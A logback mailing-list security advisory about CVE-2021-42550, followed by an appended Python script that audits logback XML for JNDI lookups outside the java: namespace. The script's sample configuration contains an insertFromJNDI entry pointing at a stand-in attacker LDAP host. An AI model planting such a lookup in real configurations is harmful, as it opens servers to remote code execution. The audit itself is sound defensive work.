[logback-dev] Security Fix - logback 1.2.9 and 1.3.0-alpha11
Ceki Gülcü
ceki at qos.ch
Fri Dec 17 03:49:06 CET 2021
Hello all,
Since the publication of the log4shell attack, a vulnerability of lesser
importance has been reported against logback, namely CVE-2021-42550.
See https://cve.report/CVE-2021-42550 for a description.
See https://github.com/cn-panda/logbackRceDemo for a demo of the
attack.
In response, we have made several changes to logback components so as to
harden them. We have also dropped Groovy configuration support with no
replacement.
Please refer to the news page for more details.
http://logback.qos.ch/news.html
Even if the vulnerability found in logback is less threatening, we
highly recommend that you upgrade to logback version 1.2.9 if you are on
the 1.2.x series and to version 1.3.0-alpha11 if you are already on the
1.3.x series.
Best regards,
--
Ceki Gülcü
Please contact support(at)qos.ch for donations, sponsorship or support
contracts related to SLF4J or logback projects.
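As an added example, not code from the post above nor from the logback project: a small audit script for logback XML configurations. It assumes (as the linked demo shows) that the CVE-2021-42550 attack pattern is an `<insertFromJNDI>` element whose `env-entry-name` points at an attacker-controlled LDAP server rather than a name in the container's `java:` namespace, and it flags any such lookup so a reviewer can spot a malicious configuration before it is loaded. The two configuration strings are constructed for this example; the LDAP host and the hardened variable name are placeholders.

```python
"""Audit a logback XML configuration for JNDI lookups outside the java: namespace.

Added example, not part of the logback project. Assumption: the risky pattern is
<insertFromJNDI env-entry-name="ldap://..." as="..."/>, which asks the JNDI
provider to resolve an external (attacker-chosen) name during configuration.
"""
import xml.etree.ElementTree as ET


def audit_logback_config(xml_text: str) -> list:
    """Return one finding per insertFromJNDI element that does not use java:."""
    findings = []
    root = ET.fromstring(xml_text)
    # iter() walks the whole tree, so nested <if>/<then> blocks are covered too.
    for el in root.iter("insertFromJNDI"):
        name = el.get("env-entry-name", "")
        alias = el.get("as", "")
        if not name.startswith("java:"):
            findings.append(
                f"insertFromJNDI as='{alias}' resolves '{name}' outside the java: namespace"
            )
    return findings


# Constructed sample: a configuration of the shape used by the RCE demo.
# attacker.example is a placeholder host, not a real server.
VULNERABLE_CONFIG = """<configuration>
  <insertFromJNDI env-entry-name="ldap://attacker.example:1389/Exploit" as="appName"/>
  <appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender">
    <encoder><pattern>%d %-5level [${appName}] %msg%n</pattern></encoder>
  </appender>
  <root level="INFO"><appender-ref ref="STDOUT"/></root>
</configuration>"""

# Constructed sample: same configuration, lookup confined to the java: namespace.
HARDENED_CONFIG = """<configuration>
  <insertFromJNDI env-entry-name="java:comp/env/appName" as="appName"/>
  <appender name="STDOUT" class="ch.qos.logback.core.ConsoleAppender">
    <encoder><pattern>%d %-5level [${appName}] %msg%n</pattern></encoder>
  </appender>
  <root level="INFO"><appender-ref ref="STDOUT"/></root>
</configuration>"""


if __name__ == "__main__":
    for label, cfg in (("vulnerable", VULNERABLE_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_logback_config(cfg) or "no findings")
```

Run it over every logback.xml (and logback-test.xml) checked into a repository or deployed alongside an application; a finding means the file should be treated as untrusted input until the lookup is removed, independently of upgrading to 1.2.9.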